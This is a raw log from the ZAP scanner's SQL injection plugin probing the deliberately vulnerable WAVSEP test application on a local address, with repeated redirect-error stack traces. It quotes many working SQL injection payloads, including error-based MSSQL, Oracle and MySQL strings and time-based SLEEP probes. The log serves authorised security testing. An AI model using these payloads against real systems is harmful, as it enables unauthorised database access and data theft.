http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 8239=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8239=8239) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- BLog at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962781 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 1781=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1781=1781) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (4873=4873] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 1781=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1781=1781) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (4873=4873 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962782 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 8949=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8949=8949) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 8949=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8949=8949) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962783 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 9693=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (9693=9693) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('YngW'='YngW] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 9693=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (9693=9693) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('YngW'='YngW at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962786 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 3160=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3160=3160) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'KlIe'='KlIe] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 3160=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3160=3160) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'KlIe'='KlIe at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962788 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 2671=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2671=2671) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 2671=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2671=2671) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962790 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 2576=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2576=2576) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- WhyB] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 2576=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2576=2576) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- WhyB at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962791 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 1986 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1986=1986,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/(SELECT 1986 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1986=1986,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962792 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(8466=8466,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(8466=8466,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962794 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1043=1043) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1043=1043) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962796 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8591=8591) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8591=8591) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962797 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp);(SELECT * FROM (SELECT(SLEEP(5)))XfYN)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp);(SELECT * FROM (SELECT(SLEEP(5)))XfYN)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962799 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;(SELECT * FROM (SELECT(SLEEP(5)))wcqR)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp;(SELECT * FROM (SELECT(SLEEP(5)))wcqR)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at 